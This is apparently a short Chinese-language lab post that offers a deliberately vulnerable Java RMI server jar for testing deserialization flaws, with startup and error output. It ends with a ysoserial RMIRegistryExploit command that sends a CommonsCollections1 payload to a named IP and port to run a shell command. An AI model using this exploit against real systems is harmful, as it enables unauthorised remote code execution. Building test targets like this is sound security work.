功能:
命令行启动jar包,用户自定义启动RMI端口。默认内置Apache Commons Collections。只需一键启动即可测试java反序列化漏洞。
启动服务:
[root@sevck_v3 tmp]# java -jar rmi.jar 1201 This rmi port is: 1201 java rmi server start!
如果已经绑定端口:
[root@sevck_v3 tmp]# java -jar rmi.jar 1200 This rmi port is: 1200 java.rmi.server.ExportException: Port already in use: 1200; nested exception is: java.net.BindException: Address already in use (Bind failed) at sun.rmi.transport.tcp.TCPTransport.listen(TCPTransport.java:341) at sun.rmi.transport.tcp.TCPTransport.exportObject(TCPTransport.java:249) at sun.rmi.transport.tcp.TCPEndpoint.exportObject(TCPEndpoint.java:411) at sun.rmi.transport.LiveRef.exportObject(LiveRef.java:147) at sun.rmi.server.UnicastServerRef.exportObject(UnicastServerRef.java:236) at sun.rmi.registry.RegistryImpl.setup(RegistryImpl.java:213) at sun.rmi.registry.RegistryImpl.<init>(RegistryImpl.java:198) at java.rmi.registry.LocateRegistry.createRegistry(LocateRegistry.java:203) at rmi.server.Server.main(Server.java:62) Caused by: java.net.BindException: Address already in use (Bind failed) at java.net.PlainSocketImpl.socketBind(Native Method) at java.net.AbstractPlainSocketImpl.bind(AbstractPlainSocketImpl.java:387) at java.net.ServerSocket.bind(ServerSocket.java:375) at java.net.ServerSocket.<init>(ServerSocket.java:237) at java.net.ServerSocket.<init>(ServerSocket.java:128) at sun.rmi.transport.proxy.RMIDirectSocketFactory.createServerSocket(RMIDirectSocketFactory.java:45) at sun.rmi.transport.proxy.RMIMasterSocketFactory.createServerSocket(RMIMasterSocketFactory.java:345) at sun.rmi.transport.tcp.TCPEndpoint.newServerSocket(TCPEndpoint.java:666) at sun.rmi.transport.tcp.TCPTransport.listen(TCPTransport.java:330) ... 8 more
工具下载: http://scan.javasec.cn/java/rmi.jar
攻击者:
java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.RMIRegistryExploit 121.42.182.208 1234 CommonsCollections1 "touch /tmp/test"
工具ysoserial自行github下载